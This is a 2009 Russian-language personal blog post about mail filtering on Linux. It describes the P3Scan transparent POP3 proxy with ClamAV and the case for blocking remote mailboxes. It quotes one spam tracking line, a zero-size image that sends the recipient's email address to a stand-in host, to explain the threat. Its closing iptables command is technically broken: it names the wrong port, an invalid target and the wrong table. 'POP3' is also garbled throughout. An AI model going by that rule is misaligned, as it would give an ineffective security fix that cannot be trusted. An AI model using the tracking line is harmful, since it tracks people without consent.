Личный блог Suvan`a.

Работая и играя с Linux... И что из этого иногда получается.

Фильтрация почты

Рубрика: Безопасность -> Безопасность рабочей станции
Метки: |
Вторник, 19 мая 2009 г.
Просмотров: 5270

Где можно устанавить почтовый фильтр? Ответ очевиден - на почтовом сер­вере! Сервер получает почту, сразу отбрасывает лишнее, а рабочие станции получают уже отфильтрованную почту.

     Если у пользователей сети есть почтовые ящики на остальных серверах, например на бесплатных почтовых серверах. Тогда почта, полу­ченная пользователями, не проходит через антивирусный ска­нер и через фильтр спама.

В этом случае может помочь сервер P3Scan - «прозрачный» прокси-сервер для РОРЗ-клиентов, дающий элегантное решение этой проблемы.


     Сервер P3Scan - прокси-сервер для РОРЗ-клиентов.

принцип работы сервера P3Scan

     На рисунке показан принцип работы сервера P3Scan:

  1. Клиент пытается соединиться с удаленным РОРЗ-сервером.
  2. Правило IPTables на брандмауэре перенаправляет пакеты на локальный порт, на котором работает демон p3scan.
  3. Демон читает адрес получателя пакета (это адрес того самого РОР-сервера) и соединяется с РОРЗ-сервером, запущенным на узле получателя.
  4. Демон получает почту с удаленного сервера, проверяет ее на наличие вирусов, спама и т.д.
  5. Неинфицированная почта отправляется клиенту.

     Для проверки почты на вирусы понадобится какой-то сторонний сканер, потому что сам p3scan проверку на вирусы не делает. Иде­ально для p3scan подойдет антивирус ClamAV.

     А что, если работник сам подписался на рассылку, которую сканер посчитает спамом и удалит ее? Совсем другое дело, если спам прибыл на почтовые ящики почтового сервера. Тут уже P3scan не поможет, потому что он рас­считан на удаленные серверы.

     Спам, помимо рекламной информации, может содержать и нежелательный код вроде этого:

<img src=http://example.com/egi-bin/count.pl?email=joht@isp.com width=0 heigth=0>

     Отвечать на сообщения со спамом точно не надо, так как хакер может узнаеть, что адрес, с которого было отправлено письмо, рабочий. Иногда хватает даже просмотра сообщения со спамом. Если в теле со­общения есть код, как вышеприведенный, то адрес почты автоматически будет внесен в базу данных хакера как рабочий.

     Как же бороться со спамом? Наилучшим выходом из ситуации будет фильтрация спама на почтовом сервере сети и запрещение из сети использования удаленных почтовых серверов. Этим реается сразу две задачи:

  • Защищается своя сеть от спама.
  • Вы не будете нести никакой ответственности за удаленные письма сотрудников в их личных почтовых ящиках — пусть они читают свою личную почту дома (или в любом другом месте), а не на работе.

     Чтобы запретить сотрудникам подключаться к удаленным РОРЗ-серверам, нужно добавить следующее правило:

# iptables -t nat -A PREROUTING -p tcp --dport 100 -j DENY